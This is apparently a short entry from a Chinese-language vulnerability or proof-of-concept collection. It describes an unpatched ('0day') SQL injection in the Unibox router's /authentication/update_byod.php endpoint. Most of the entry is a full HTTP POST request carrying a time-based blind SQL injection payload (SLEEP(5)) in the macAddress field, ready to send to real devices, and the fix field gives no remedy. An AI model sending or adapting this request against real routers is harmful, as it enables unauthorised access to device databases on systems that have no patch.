vendor = "Unibox"
name = "Unibox路由器update_byod.php SQL注入"
type = "SQL注入"
version = "未知"
path = "/authentication/update_byod.php"
detail = "POST /authentication/update_byod.php HTTP/1.1Host: Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36Accept-Encoding: gzip, deflateConnection: close update=1&macAddress=1' AND (SELECT 2222 FROM (SELECT(SLEEP(5)))ogZo) AND 'NXsn'='NXsn&oldMacAddress="
fix = "没市场占有率"
date = "0704"
label = "0day"
verifier = "AdySec"
